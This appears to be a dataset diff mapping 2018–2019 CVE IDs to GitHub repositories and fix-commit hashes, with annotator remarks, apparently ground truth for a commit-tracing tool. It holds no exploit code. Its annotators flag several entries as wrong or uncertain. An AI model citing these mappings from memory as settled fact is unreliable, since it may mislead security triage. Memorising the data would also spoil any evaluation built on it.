+CVE-2018-20595;https://github.com/hs-web/hsweb-framework;None:None;False;40929e9b0d336a26281a5ed2e0e721d54dd8d2f2; +CVE-2018-20677;https://github.com/twbs/bootstrap;None:None;False;2a5ba23ce8f041f3548317acc992ed8a736b609d; their commit is not correct (second one) +CVE-2018-20713;https://github.com/shopware/shopware;None:None;False;73cb46727050e28a0d7c2cf8471baaa3eaf2e5e8; +CVE-2018-20745;https://github.com/yiisoft/yii2;None:None;False;3317d26df0497c2f1a7f8fb9d1c668d911ab284f,2b6d1818783b103993873661c7736431b0a07604; +CVE-2018-20756;https://github.com/modxcms/revolution;None:None;False;4219e90f84e21f9cf4acc07ac926b5cde12731a4,b014e57624479b637586630a0376acc1e2be47c0,20049805dad576250185e4317c4ded1d21871219; +CVE-2018-20801;https://github.com/highcharts/highcharts;None:None;False;7c547e1e0f5e4379f94396efd559a566668c0dfa; +CVE-2018-20834;https://github.com/npm/node-tar;None:None;False;b0c58433c22f5e7fe8b1c76373f27e3f81dcd4c8,7ecef07da6a9e72cc0c4d0c9c6a8e85b6b52395d; +CVE-2018-20835;https://github.com/mafintosh/tar-fs;None:None;False;06672828e6fa29ac8551b1b6f36c852a9a3c58a2; +CVE-2018-20962;https://github.com/Laravel-Backpack/CRUD;None:None;False;8b6bd0a2d489a4690f6b1d7ace67e2f07f5f0cc6; +CVE-2018-20975;https://github.com/fatfreecrm/fat_free_crm;None:None;False;f2514212ae80781a9bbf7b6f4820f57d652a405f,4a57efa76ceb55c8fd8f1595f8d5c6946faa2307,346c5e0704926954e2e42f5a3c64628257a6315b,fe39b442722d9926229e325cf7a43b817bfa5a02,2f5c7fa22b085d2fe6e8aec066eb2f74c1403c1f,6d60bc8ed010c4eda05d6645c64849f415f68d65; +CVE-2018-1000013;https://github.com/jenkinsci/release-plugin;None:None;False;fe1660a5ebff2377b6a64214c6012e8615b3f81f; +CVE-2018-1000014;https://github.com/jenkinsci/translation-plugin;None:None;False;1287c8ead6adc891210b8b9fbc33f07adebf720d; +CVE-2018-1000060;https://github.com/sensu/sensu;None:None;False;46ff10023e8cbf1b6978838f47c51b20b98fe30b,44dc4263021782728c0d12b24f57c4cefd8e9360; +CVE-2018-1000088;https://github.com/doorkeeper-gem/doorkeeper;None:None;False;7b1a8373ecd69768c896000c7971dbf48948c1b5,90fe419eb72f20fb8d9a3b4ec9ff00e8f6d897c6,84fd4d03bced7d04ab2c68cecf26e838ae96faf4,39916a613b7dcc738aa38f7a17e1de9757bd0754; +CVE-2018-1000089;https://github.com/anymail/django-anymail;None:None;False;1a6086f2b58478d71f89bf27eb034ed81aefe5ef; +CVE-2018-1000096;https://github.com/brianleroux/tiny-json-http;None:None;False;1460a815c9a657daaf29ebdf085b935221fcf676,3c1e36d8bef3ef5fd8e4447f816d5ffe2bfc3190; vulnerable tag is fixed +CVE-2018-1000118;https://github.com/electron/electron;None:None;False;ce361a12e355f9e1e99c989f1ea056c9e502dbe7,92f4e5ea7d99c5a1b425c77c9c73ae360ea9f69c,0b7fd96629805e95014ac13c29f732dbd6837713; +CVE-2018-1000119;https://github.com/sinatra/sinatra;None:None;False;8aa6c42ef724f93ae309fb7c5668e19ad547eceb; +CVE-2018-1000129;https://github.com/rhuss/jolokia;None:None;False;5895d5c137c335e6b473e9dcb9baf748851bbc5f; +CVE-2018-1000134;https://github.com/pingidentity/ldapsdk;None:None;False;8471904a02438c03965d21367890276bc25fa5a6; the release commit contains the CVE ID just as reference, this is bs. Commit ID is in the advisory description +CVE-2018-1000159;https://github.com/tlsfuzzer/tlslite-ng;None:None;False;e5e9145558f4c1a81071c61c947aa55a52542585,3674815d1b0f7484454995e2737a352e0a6a93d8,cf1e82729f3bd44b9dd5d88a6f3a64c73b131889,ec5c61fae8b8eee0f62717091775f68d8161ca34; +CVE-2018-1000164;https://github.com/benoitc/gunicorn;None:None;False;1e10a02e73c87dfadc394b361af33864d0e59e24; +CVE-2018-1000518;https://github.com/aaugustin/websockets;None:None;False;b6a25ceb3555d0ba69e5961b8d7616e4c1aecb2b; +CVE-2018-1000525;https://github.com/flack/openpsa;None:None;False;097eae045cde6e59b063261cf7cdaa896d14ab39; +CVE-2018-1000531;https://github.com/FusionAuth/fusionauth-jwt;None:None;False;abb0d479389a2509f939452a6767dc424bb5e6ba; +CVE-2018-1000538;https://github.com/minio/minio;None:None;False;9c8b7306f55f2c8c0a5c7cea9a8db9d34be8faa7; +CVE-2018-1000539;https://github.com/nov/json-jwt;None:None;False;3393f394f271c87bd42ec23c300727b4437d1638,a3b2147f0f6d9aca653e7a30e453d3a92b33413f; +CVE-2018-1000559;https://github.com/qutebrowser/qutebrowser;None:None;False;5a7869f2feaa346853d2a85413d6527c87ef0d9f,4c9360237f186681b1e3f2a0f30c45161cf405c7; +CVE-2018-1000613;https://github.com/bcgit/bc-java;None:None;False;4092ede58da51af9a21e4825fbad0d9a3ef5a223,cd98322b171b15b3f88c5ec871175147893c31e6; +CVE-2018-1000620;https://github.com/hapijs/cryptiles;None:None;False;9332d4263a32b84e76bf538d7470d01ea63fa047; +CVE-2018-1000632;https://github.com/dom4j/dom4j;None:None;False;e598eb43d418744c4dbf62f647dd2381c9ce9387; +CVE-2018-1000644;https://github.com/eclipse/rdf4j;None:None;False;c412f4274a9b0a95fd4f2c26ce42b9800caf4f0a,50f2f51950227a4ec595a2922d81da487aba5135; fixed tag is vulnerable +CVE-2018-1000665;https://github.com/dojo/dojo;None:None;False;9e4b7252dc4fcfe6bed1e4e1081a05d2d0a5c53a,2e27f9ad62405dce64369cb0f7aeb5c64e873693,c15b3e7c215389a1474b2fa6565b112e3b9ffc0f,48cb00f29d8b87a5c006d237a39dcd5ec6c68fc5,595ea4e7a8da5960f29ecbe1320e755ea688797c,33eb767c477c6953446d9af8f5229d44d3dd8500,9117ffd5a3863e44c92fcd58564c0da22be858f4; +CVE-2018-1000803;https://github.com/go-gitea/gitea;None:None;False;194a11eb110cd98fc2ba52861abf7770db6885a3,99ce0bfcd7126ec0d82166c63865bde4d9d75d84; +CVE-2018-1000805;https://github.com/paramiko/paramiko;None:None;False;56c96a659658acdbb873aef8809a7b508434dcce; +CVE-2018-1000807;https://github.com/pyca/pyopenssl;None:None;False;e73818600065821d588af475b024f4eb518c3509; +CVE-2018-1000808;https://github.com/pyca/pyopenssl;None:None;False;e73818600065821d588af475b024f4eb518c3509; +CVE-2018-1000809;https://github.com/privacyidea/privacyidea;None:None;False;189312a99b499fe405fd3df5dd03a6b19ba66d46,a3edc09beffa2104f357fe24971ea3211ce40751; tracer wrong +CVE-2018-1000814;https://github.com/aio-libs/aiohttp-session;None:None;False;1b356f01bbab57d041c9a75bacd72fbbf8524728; +CVE-2018-1000820;https://github.com/neo4j-contrib/neo4j-apoc-procedures;None:None;False;e04325c48663994af0bab69a551ad64be2219708,45bc09c8bd7f17283e2a7e85ce3f02cb4be4fd1a; +CVE-2018-1000822;https://github.com/codelibs/fess;None:None;False;f68636939d479be650aaa90762c2a06b57ccc83f,4e0d9f5faaf4ec75dbe89f5ff97ece0f03b097a8,faa265b8d8f1c71e1bf3229fba5f8cc58a5611b7; +CVE-2018-1000843;https://github.com/spotify/luigi;None:None;False;1a5b64106e9182aca70b52b0c55d70c64d76f413; vulnerable tag is fixed +CVE-2018-1000850;https://github.com/square/retrofit;None:None;False;b9a7f6ad72073ddd40254c0058710e87a073047d; +CVE-2018-1000854;https://github.com/esigate/esigate;None:None;False;30cad23a8f282600c9b045e1af09f6f8a65357b1,8461193d2f358bcf1c3fabf82891a66786bfb540,b866acb1ebc661dbe475330e27e0d69693de1971; +CVE-2018-1000855;https://github.com/basecamp/easymon;None:None;False;a5deaf7359fc177fcf3fca725618b53619a30b7e,16b787030584857046ce2e81e60c811d55a015a6; +CVE-2018-1000872;https://github.com/OpenKMIP/PyKMIP;None:None;False;3a7b880bdf70d295ed8af3a5880bab65fa6b3932,06c960236bcaf6717fc5cf66cf8b5179804c5a05; +CVE-2018-1000888;https://github.com/pear/Archive_Tar;None:None;False;59ace120ac5ceb5f0d36e40e48e1884de1badf76; +CVE-2018-1002101;https://github.com/kubernetes/kubernetes;None:None;False;b2fb73ffead03d3d13f054b45867981bf2916976,46981ede3a65ac8a80abaeb6ccb480537bcb3d2d,914e404d3fc40d6c1d1d02abf2fd3ea0667f3fca,d65039c56ce4de5f2efdc38aa1284eeb95f89169,27bc865cc1bffb97d4dff38492aa9f830f859e45; +CVE-2018-1002102;https://github.com/kubernetes/kubernetes;None:None;False;50cf168e83f942f4850191c268461d07fcac19c7,d9aeea6ba4a52a4924050636c2205d007d4a507d,109b67c291de3b9bda35c35e471b9064de6ff859,4ee9f007cbc88cca5fa3e8576ff951a52a248e3c,e385ba8c4a0860746e661b39611c88aff5bee5f2,687c04c53006441ed40f4fa7c09a726cfcec380e; vulnerable tag is fixed +CVE-2018-1002105;https://github.com/kubernetes/kubernetes;None:None;False;4faa71170f4ba2d36e346ccc319b8405d807c657,753b2dbc622f5cc417845f0ff8a77f539a4213ea,0535bcef95a33855f0a722c8cd822c663fc6275e,637c7e288581ee40ab4ca210618a89a555b6e7e9,774585f773c7c591645f876e0a26155b7838debe,435f92c719f279a3a67808c80521ea17d5715c66,b84e3dd6f80af4016acfd891ef6cc50ce05d4b5b,2257c1ecbe3c0cf71dd50b82752ae189c94ec905; +CVE-2018-1002150;https://github.com/koji-project/koji;None:None;False;642bcb3bd9139aaedafe5b3600dd71a326c0026f,ab1ade75c155c2325ec92913fc5c510fd61757a1,84c0bde0cac42c3199d636ad934f852276f10975,4ea5849ff0cb9a1cc799de50b8573b0561dcfcef,5fbd954bfa883051d8cf7a294f965cb4f87dab83,8024d38f8766f95e7fd783b866966aaeffe5140e; Advisory does not mention 1.16, we find the correct backports +CVE-2018-1002200;https://github.com/codehaus-plexus/plexus-archiver;None:None;False;f8f4233508193b70df33759ae9dc6154d69c2ea8,a1b58c0cccc4e9a2e4b06284254492b6ecf6033a,58bc24e465c0842981692adbf6d75680298989de; +CVE-2018-1002201;https://github.com/zeroturnaround/zt-zip;None:None;False;759b72f33bc8f4d69f84f09fcb7f010ad45d6fff; +CVE-2018-1002203;https://github.com/ZJONSSON/node-unzipper;None:None;False;2220ddd5b58f6252069a4f99f9475441ad0b50cd,5f68901c2e2e062a5e0083a81d257eccea0eb760; +CVE-2018-1002204;https://github.com/cthackers/adm-zip;None:None;False;6f4dfeb9a2166e93207443879988f97d88a37cde,62f64004fefb894c523a7143e8a88ebe6c84df25; +CVE-2018-1002205;https://github.com/haf/DotNetZip.Semverd;None:None;False;55d2c13c0cc64654e18fcdd0038fdb3d7458e366,8e79ed7dc17fe6d3c74c7ac1344b2aa60eb30039; +CVE-2018-1002207;https://github.com/mholt/archiver;None:None;False;e4ef56d48eb029648b0e895bb0b6a393ef0829c3; +CVE-2018-1002208;https://github.com/icsharpcode/SharpZipLib;None:None;False;5376c2daf1c0e0665398dee765af2047e43146ca; commit in reference is retrieved from a release and is a random wrong one +CVE-2018-1999024;https://github.com/mathjax/MathJax;None:None;False;a55da396c18cafb767a26aa9ad96f6f4199852f1; +CVE-2019-0194;https://github.com/apache/camel;None:None;False;53185f0b221b899aacb3c379647a866a8f408a87,68f2de31b7752bd49b7898d7098b3bfe8e0d0bdb,05ff65d5cebf1fa5172c59dd16359ed583c099ca,f337a98e86ef18611b14570e6780053fe3ddcc02,15a1f10fb532bdcba184cda17be602a2358bd5e8,5b64969d37cf2906efd4623cfd473041ce5132fd; +CVE-2019-0201;https://github.com/emperwang/zookeeper;None:None;False;5ff19e3672987bdde2843a3f031e2bf0010e35f1,af741cb319d4760cfab1cd3b560635adacd8deca; this repo has no tag +CVE-2019-0207;https://github.com/apache/tapestry-5;None:None;False;6dd7219fd4707467a36091e2f7f5f6460c619099; +CVE-2019-0210;https://github.com/apache/thrift;None:None;False;264a3f318ed3e9e51573f67f963c8509786bcec2,92c660f541fff657682f8239b6a995f3b71e6214; +CVE-2019-0219;https://github.com/apache/cordova-plugin-inappbrowser;None:None;False;686108484e6a7c1a316d7c6bc869c209c46d27e3; +CVE-2019-0226;https://github.com/apache/karaf;None:None;False;fe3bc4108e5a8b3c804e5da91ec0d5695588eb25,4155eac7dffa933f12c1e0cf18e9492ccc931093,bf5ed62d310f9042f9305dafac9a851464bb27cf; +CVE-2019-0228;https://github.com/apache/pdfbox;None:None;False;e5232887e684aeffc37ebb25ee8953e43d95c77c,be36ef01842885b556a4e7b40b5e2e8e7b1d2816; +CVE-2019-0911;https://github.com/chakra-core/ChakraCore;None:None;False;a2deba5e1850782014a2a34678464b251e448337; +CVE-2019-0912;https://github.com/chakra-core/ChakraCore;None:None;False;936a5af1c07e0fdec9aab85c05339dabe4aaeeb1; +CVE-2019-0917;https://github.com/chakra-core/ChakraCore;None:None;False;b5f8fad1b00087bd0a24cc173c2dfedc4f8aee33; +CVE-2019-0922;https://github.com/chakra-core/ChakraCore;None:None;False;a9ab1aae31078e80593b9227db11d316c2239ef3; +CVE-2019-0924;https://github.com/chakra-core/ChakraCore;None:None;False;6615113a09c0618ecc10e5680ffb978bf665641f; +CVE-2019-0925;https://github.com/chakra-core/ChakraCore;None:None;False;32ca10f3955f2a3ca56c6671c721b1264eca06b8; +CVE-2019-0933;https://github.com/chakra-core/ChakraCore;None:None;False;1a550c67b33b27675c0553152cabd09e4ffe3abf; +CVE-2019-1001;https://github.com/chakra-core/ChakraCore;None:None;False;75162b7f2d8ac2b37d17564e9c979ba1bae707e8,f8a6b80b4e5f7caeb7d3a61fe6836ebf69cfff85; +CVE-2019-1052;https://github.com/chakra-core/ChakraCore;None:None;False;66ab97c09c49c631234c0ec202b0822d0c2833cc; +CVE-2019-1062;https://github.com/microsoft/ChakraCore;None:None;False;7f0d390ad77d838cbb81d4586c83ec822f384ce8; +CVE-2019-1092;https://github.com/chakra-core/ChakraCore;None:None;False;d4e767fb946128c135d77edda7a794561e1c1f06; +CVE-2019-1103;https://github.com/chakra-core/ChakraCore;None:None;False;efab3101028045cbfa0cc21bd852f75bcc037dba; +CVE-2019-1106;https://github.com/chakra-core/ChakraCore;None:None;False;362e96537af207be3ecf7fa32f338229ee1dcc46; +CVE-2019-1107;https://github.com/chakra-core/ChakraCore;None:None;False;214dec9461f9acb9a4b9004368d2a81e0c125652; +CVE-2019-1139;https://github.com/microsoft/ChakraCore;None:None;False;ae8a8d9644e677a9878e5dd7824d4b876454e799; +CVE-2019-1195;https://github.com/microsoft/ChakraCore;None:None;False;c70af488e435ebd552f3da0547dee39dc8437a64; Same comment than CVE-2019-1197 (different fix commit) +CVE-2019-1196;https://github.com/microsoft/ChakraCore;None:None;False;dce7443ae45f82eceec3284974610e1a1bbe6792; Same comment than CVE-2019-1197 (different fix commit) +CVE-2019-1197;https://github.com/microsoft/ChakraCore;None:None;False;bf52b6cfa96d6395046d0aaf87396cd7ca13f6cb; It was easier to find the fix (bf52b6c) with google than the fixed version. +CVE-2019-1552;https://github.com/openssl/openssl;None:None;False;e32bc855a81a2d48d215c506bdeb4f598045f7e9,d333ebaf9c77332754a9d5e111e2f53e1de54fdd,b15a19c148384e73338aa7c5b12652138e35ed28,54aa9d51b09d67e90db443f682cface795f5af9e; +CVE-2019-3465;https://github.com/robrichards/xmlseclibs;None:None;False;8624602cce5175986ae5df87b6ea9596b742c7f9,46fa8b5a4fee597fece67773601e8b9dde7cb7df,118450a141ac2336be1b5e5e91a22229441b0277,0a53d3c3aa87564910cae4ed01416441d3ae0db5; +CVE-2019-3498;https://github.com/django/django;None:None;False;64d2396e83aedba3fcc84ca40f23fbd22f0b9b5b,1cd00fcf52d089ef0fe03beabd05d59df8ea052a,1ecc0a395be721e987e8e9fdfadde952b6dee1c7,9f4ed7c94c62e21644ef5115e393ac426b886f2e; +CVE-2019-3564;https://github.com/facebook/fbthrift;None:None;False;c461c1bd1a3e130b181aa9c854da3030cd4b5156; +CVE-2019-3772;https://github.com/spring-projects/spring-integration;None:None;False;59c69ed40d3755ef59f80872e0ea711adbb13620; +CVE-2019-3774;https://github.com/spring-projects/spring-batch;None:None;False;8dc3bb7d3c3d0b1487e3ef3dcbdebda865d2b20e,c7930184ee4513d548940550c4eb5eeef028cb64,a6d8ac1b44afeca1bb572718ceacac774a368422; +CVE-2019-3792;https://github.com/concourse/concourse;None:None;False;dc3d15ab6c3a69890c9985f9c875d4c2949be727; +CVE-2019-3799;https://github.com/spring-cloud/spring-cloud-config;None:None;False;3632fc6f64e567286c42c5a2f1b8142bfde505c2,9617f2922ee2ae27f08676716224933f0d869719,90e8a81f6fa921e034cecb79cd100f343f7714af,d3e21866a5f192fa2582349cb3732ad0e4b8850b; +CVE-2019-3808;https://github.com/moodle/moodle;None:None;False;cfde0b8d38061f370a5c21523c2188aca5a7160d,6360f87cdca744a6a71c315853f6d811a3e54e26,9ca8ccbefc3e1f56621c866f3af69bdb6cc98a15,3d2783690da2281e5e360c40961cd6846e1dbbb8; +CVE-2019-3810;https://github.com/moodle/moodle;None:None;False;14f9bad3cebf1aa6bb73be48020653e1f792dc29,2e057f082d622b09a33fd32aff3b4d275aed04dc; +CVE-2019-3826;https://github.com/prometheus/prometheus;None:None;False;b03d6f6eff8283bd7cb063edc21041d3fb6c9878; just CHANGELOG.md +CVE-2019-3847;https://github.com/moodle/moodle;None:None;False;a37e26d2efe1ca0e4d8d69c611a748af35b33674,070f24d006eab6b958eb083530de159b43c538ed,e836242e1c04cd62d0afa4a790074fd245628e7a,93dda3bfd3caaaa8d23fe8ede543f27ef774958d,ec3b63c772d6448765c68268234cf36c1a91bcac; +CVE-2019-3850;https://github.com/moodle/moodle;None:None;False;5d87464bc6283e72969cd251ce4f399aacebd608,d3f2f990dd3c5d4e6073a77154c6423d1c304647,907b377e51c32ea37feef53e10684b504e103273,1fc481dd7b09e08e85824c1fe6733b303a36bdce,772c908d40a944efd91d897d524b255626d330d4; +CVE-2019-3888;https://github.com/undertow-io/undertow;None:None;False;20cacc96c0594f4f4f9bb1cc2b93a77b6be3f74c,9bf05b765e222dd106fee9b46314061b18b7275e; was 2.0.20:2.0.21 +CVE-2019-3894;https://github.com/wildfly/wildfly;None:None;False;84975f8a4dd5f243c7ff5122c0d36783b116a0d7,936d0b0284288c837464229a255e2cdf1e10132d; +CVE-2019-5018;https://github.com/sqlite/sqlite;None:None;False;4ded26a53c4df312e9fd06facbbf70377e969983; repo was wrong wtf, only debian says the correct fixed version +CVE-2019-5413;https://github.com/expressjs/morgan;None:None;False;e329663836809de4be557b200a5b983ab8b4e6c2; +CVE-2019-5421;https://github.com/heartcombo/devise;None:None;False;36690f33a44a489e649022f0c56f41a38020414b,fb48336709bc1a29ff15b7170ed7b33906c66888,62703943bef75aba09ec3e346aba4c9159300ecd; +CVE-2019-5444;https://github.com/ChristoPy/serve-here.js;None:None;False;cefb51d03290b6a88dd13143ab2de31b8cf57c39; +CVE-2019-5448;https://github.com/yarnpkg/yarn;None:None;False;2f08a7405cc3f6fe47c30293050bb0ac94850932,c10ef6ab60f0bc80f65838d675325f6c17f04f24; +CVE-2019-5477;https://github.com/sparklemotion/nokogiri;None:None;False;5fe449fd3ab8cc25a71499128529c821c10dde83,daffe223967b74b3205513b5e600aa5dfefe687d,6777008202c1bde0520bb09fd1f02dee64dbcb60; +CVE-2019-5479;https://github.com/larvit/larvitbase-api;None:None;False;0e953337e75770abdcc0a8bb71932a44d2239514; +CVE-2019-5484;https://github.com/bower/bower;None:None;False;45c6bfa86f6e57731b153baca9e0b41a1cc699e3; +CVE-2019-5884;https://github.com/Studio-42/elFinder;None:None;False;f133163f2d754584de65d718b2fde96191557316; +CVE-2019-6798;https://github.com/phpmyadmin/phpmyadmin;None:None;False;469934cf7d3bd19a839eb78670590f7511399435; +CVE-2019-6802;https://github.com/pypiserver/pypiserver;None:None;False;1375a67c55a9b8d4619df30d2a1c0b239d7357e6,0284cb7f50b037688efdc4fb8de83878eedbe724; +CVE-2019-6975;https://github.com/django/django;None:None;False;0bbb560183fabf0533289700845dafa94951f227,83ab3e26647f6a50cdfac01ecf735cad540b2f35,40cd19055773705301c3428ed5e08a036d2091f3,1f42f82566c9d2d73aff1c42790d6b1b243f7676,402c0caa851e265410fbcaa55318f22d2bf22ee2; +CVE-2019-7164;https://github.com/sqlalchemy/sqlalchemy;None:None;False;30307c4616ad67c01ddae2e1e8e34fabf6028414; +CVE-2019-7313;https://github.com/buildbot/buildbot;None:None;False;bdae9fea4e8978b19e12425776b2d083febd91a6,f0ccd5fd572ea8223b48bd57d8c2548b2f7d3ecf,e781f110933e05ecdb30abc64327a2c7c9ff9c5a; +CVE-2019-7537;https://github.com/pytroll/donfig;None:None;False;6332fa354f1c7d6fb126a0666be8f23adbc2fcf7,a57e36e14f32bfb48d8a1953b375ed22a35ef186; +CVE-2019-7548;https://github.com/sqlalchemy/sqlalchemy;None:None;False;30307c4616ad67c01ddae2e1e8e34fabf6028414; +CVE-2019-7617;https://github.com/elastic/apm-agent-python;None:None;False;47286d746e05897c6b3af8d465aa56ab1ed8d678; +CVE-2019-7644;https://github.com/auth0/auth0-aspnet;None:None;False;69b0a09e2f3e350ca9f6cc2cc99d0219b4f248c1,870eb4b52696cf6e530b28e74f32167df35a3f12; this repo has no tag +CVE-2019-7722;https://github.com/pmd/pmd;None:None;False;e295711343cc155cb64ea0ae29ce9d69201469b3; +CVE-2019-8331;https://github.com/twbs/bootstrap;None:None;False;7bc4d2e0bc65151b6f60dccad50c9c8f50252bd6; +CVE-2019-8457;https://github.com/sqlite/sqlite;None:None;False;e41fd72acc7a06ce5a6a7d28154db1ffe8ba37a8; +CVE-2019-8903;https://github.com/totaljs/framework;None:None;False;de16238d13848149f5d1dae51f54e397a525932b,c37cafbf3e379a98db71c1125533d1e8d5b5aef7,4d7abbcdc34d6d1287338936f418c1eb1bc41201; +CVE-2019-9153;https://github.com/openpgpjs/openpgpjs;None:None;False;327d3e5392a6f59a4270569d200c7f7a2bfc4cbc,0be91133665e81d2007cdfa02cd3cf1d839ee4f1; +CVE-2019-9154;https://github.com/openpgpjs/openpgpjs;None:None;False;0be91133665e81d2007cdfa02cd3cf1d839ee4f1,47138eed61473e13ee8f05931119d3e10542c5e1; +CVE-2019-9155;https://github.com/openpgpjs/openpgpjs;None:None;False;1dd168e7a2ce6f9ba0fddf5d198e21baca9c042d; unknown tags +CVE-2019-9212;https://github.com/sofastack/sofa-hessian;None:None;False;285b071d89c8dac21d32983e54f3a8788ca34c12; +CVE-2019-9512;https://github.com/golang/go;None:None;False;5c379a437e904eb1f94296fa9d45276cd6e4f5a9,7139b45d1410ded14e1e131151fd8dfc435ede6c,145e193131eb486077b66009beb051aba07c52a5,e152b01a468a1c18a290bf9aec52ccea7693c7f2; This is a generic protocol vuln, it is not golang/go, check the advisory and re-run +CVE-2019-9658;https://github.com/checkstyle/checkstyle;None:None;False;180b4fe37a2249d4489d584505f2b7b3ab162ec6; +CVE-2019-9826;https://github.com/phpbb/phpbb;None:None;False;3075d2fecc9f5bb780bb478c0851a704c7f9b392,fd195fba210c8625e968ef5553e61864747c8d44,da9910850a168f73c6b8dd8407a01f47d27ca1d8,56060caa4c44620929b6e17fe4622343750ad302; +CVE-2019-9844;https://github.com/Khan/simple-markdown;None:None;False;8ad751f8333ce136d1a0a120d78596a30eb1e1d9; +CVE-2019-9942;https://github.com/twigphp/Twig;None:None;False;eac5422956e1dcca89a3669a03a3ff32f0502077,ad7d27425dffc763644de93da2262f69478c691b,0f3af98ef6e71929ad67fb6e5f3ad65777c1c4c5; +CVE-2019-10071;https://github.com/apache/tapestry-5;None:None;False;cdcf49c0a2b36ffc7a004d54405bb4357870c4b2; fixed tag is vulnerable +CVE-2019-10072;https://github.com/apache/tomcat;None:None;False;0bcd69c9dd8ae0ff424f2cd46de51583510b7f35,8d14c6f21d29768a39be4b6b9517060dc6606758,7f748eb6bfaba5207c89dbd7d5adf50fae847145,ada725a50a60867af3422c8e612aecaeea856a9a; +CVE-2019-10077;https://github.com/apache/jspwiki;None:None;False;87c89f0405d6b31fc165358ce5d5bc4536e32a8a; +CVE-2019-10086;https://github.com/apache/commons-beanutils;None:None;False;62e82ad92cf4818709d6044aaf257b73d42659a4,dd48f4e589462a8cdb1f29bbbccb35d6b0291d58; +CVE-2019-10089;https://github.com/apache/jspwiki;None:None;False;2956ccb307dd4b23b25c8ddeae8d7e7b301c6ff3; +CVE-2019-10090;https://github.com/apache/jspwiki;None:None;False;139746f7c25b84049437d1d9eed9456446a08bf7; +CVE-2019-10094;https://github.com/apache/tika;None:None;False;b8655aad5efaef1c5d266676350f58743770fb5b,426be73b9e7500fa3d441231fa4e473de34743f6,c4e63c9be8665cccea8b680c59a6f5cfbc03e0fc,81c21ab0aac6b3e4102a1a8906c8c7eab6f,1158d893dc952c573f7a12c7e4855cdce479fc2a,22ff7564f2641ba195f192d7c59e9df4a3a10747; +CVE-2019-10131;https://github.com/ImageMagick/ImageMagick;None:None;False;cb1214c124e1bd61f7dd551b94a794864861592e; +CVE-2019-10154;https://github.com/moodle/moodle;None:None;False;2904a7f851da8e66be12f41d55068bf07817fbd6,a3d19efab4aff83c07db9f0ad34c8f0e1f29c64c; +CVE-2019-10157;https://github.com/keycloak/keycloak-nodejs-connect;None:None;False;55e54b55d05ba636bc125a8f3d39f0052d13f8f6; +CVE-2019-10158;https://github.com/infinispan/infinispan;None:None;False;4b381c5910265972ccaabefbdbd16a2b929f6b72,7341da552a13cb9e8a44cd13c984d1f46310653e,245a0d0b169001e5a22c0ec9903942e617c0743f,debdf5447da3626d2f970050ca79cdf98bf87661; +CVE-2019-10174;https://github.com/infinispan/infinispan;None:None;False;a7dab68d194989aaa0b0aa0781cf8ee88fbe3439,7bdc2822ccf79127a488130239c49a5e944e3ca2; +CVE-2019-10184;https://github.com/undertow-io/undertow;None:None;False;5fa7ac68c0e4251c93056d9982db5e794e04ebfa,d2715e3afa13f50deaa19643676816ce391551e9; +CVE-2019-10206;https://github.com/ansible/ansible;None:None;False;d39488ece44956f6a169a498b067bbef54552be1,d728127310b4f3a40ce8b9df3affb88ffaeea073,e9a37f8e3171105941892a86a1587de18126ec5b,4b5aed4e5af4c7aab621662f50a289e99b8ac393; +CVE-2019-10217;https://github.com/ansible/ansible;None:None;False;c1ee1f142db1e669b710a65147ea32be47a91519; +CVE-2019-10219;https://github.com/hibernate/hibernate-validator;None:None;False;20d729548511ac5cff6fd459f93de137195420fe,124b7dd6d9a4ad24d4d49f74701f05a13e56ceee; +CVE-2019-10240;https://github.com/eclipse/hawkbit;None:None;False;fa6520a094a24897035dae4a3af2a69d174c7f9d; +CVE-2019-10241;https://github.com/eclipse/jetty.project;None:None;False;ca77bd384a2970cabbbdab25cf6251c6fb76cd21; +CVE-2019-10246;https://github.com/eclipse/jetty.project;None:None;False;3d028ab2ca76086a742bac7409a3620e81ec4791,1565b5f160e600d08da9b00edf081fb353a443d9,7b774d82e8234231e99b33c19acac3b6f83c0377; +CVE-2019-10247;https://github.com/eclipse/jetty.project;None:None;False;04c994712c0b29824633598cfe0bf709f3b96f09,a15534d72c0c8d84cb821c767343a91584a4fecb,6d847d4a73b34b8c19f43dcf221eefe6859b7d55,b0f72a87d5b35ff0a814143fb1725f7c6fc4e0d7,99f3926d0546032814077cf0d0a684ed80e7bb08,d983890d1769744e7da865de7ff34065fe491a28,9f506e4123b519adccb7df3599441f55daaff31e,5ef8a8abfa63b26a6f978200519730f964ebee0b; +CVE-2019-10248;https://github.com/eclipse/vorto;None:None;False;f15b81fb76b214fe40be164dfb730434ef49ec35; +CVE-2019-10249;https://github.com/eclipse/xtext-xtend;None:None;False;f34464b117bd38e8b844b01d94cf5b072b07f6ec,169de2cecc50ed9bf81c3cdc496ad8a799bdf17b; +CVE-2019-10255;https://github.com/jupyter/notebook;None:None;False;b9d9e659e9b2edd70767129c06ac76761e046791,b981c5b055041c036e05e735694c60863075247d,70fe9f0ddb3023162ece21fbb77d5564306b913b,08c4c898182edbe97aadef1815cce50448f975cb; +CVE-2019-10354;https://github.com/jenkinsci/jenkins;None:None;False;279d8109eddb7a494428baf25af9756c2e33576b; commit timestamp is outside the time interval +CVE-2019-10641;https://github.com/contao/contao;None:None;False;b92e27bc7c9e59226077937f840c74ffd0f672e8,74c7dfafa0dfa5363a9463b486522d5d526e28fe; +CVE-2019-10642;https://github.com/contao/contao;None:None;False;ee2c8130c2e68a1d0d2e75bd6b774c4393942b15; +CVE-2019-10643;https://github.com/contao/contao;None:None;False;70348cc812b110831ad66a4f9857883f75649b88; missing exact subversions (says only 4.7) +CVE-2019-10682;https://github.com/relekang/django-nopassword;None:None;False;d8b4615f5fbfe3997d96cf4cb3e342406396193c; +CVE-2019-10745;https://github.com/jonschlinkert/assign-deep;None:None;False;90bf1c551d05940898168d04066bbf15060f50cc; commit has no tags +CVE-2019-10748;https://github.com/sequelize/sequelize;None:None;False;a72a3f50bad7772ce96fc62d80f64b109fb2893f; +CVE-2019-10749;https://github.com/sequelize/sequelize;None:None;False;ee4017379db0059566ecb5424274ad4e2d66bc68; +CVE-2019-10750;https://github.com/alexindigo/deeply;None:None;False;6eccb2f03ec8d3eefc6805053c4cc2a36aab1505; +CVE-2019-10751;https://github.com/httpie/httpie;None:None;False;df36d6255df5793129b02ac82f1010171bd8a0a8; Repo changed in the meantime +CVE-2019-10752;https://github.com/sequelize/sequelize;None:None;False;9bd0bc111b6f502223edf7e902680f7cc2ed541e; +CVE-2019-10754;https://github.com/apereo/cas;None:None;False;40bf278e66786544411c471de5123e7a71826b9f; commit timestamp is outside the time interval +CVE-2019-10756;https://github.com/node-red/node-red-dashboard;None:None;False;870382792f679b0a6bbf45b29ca7f6428e51623b; 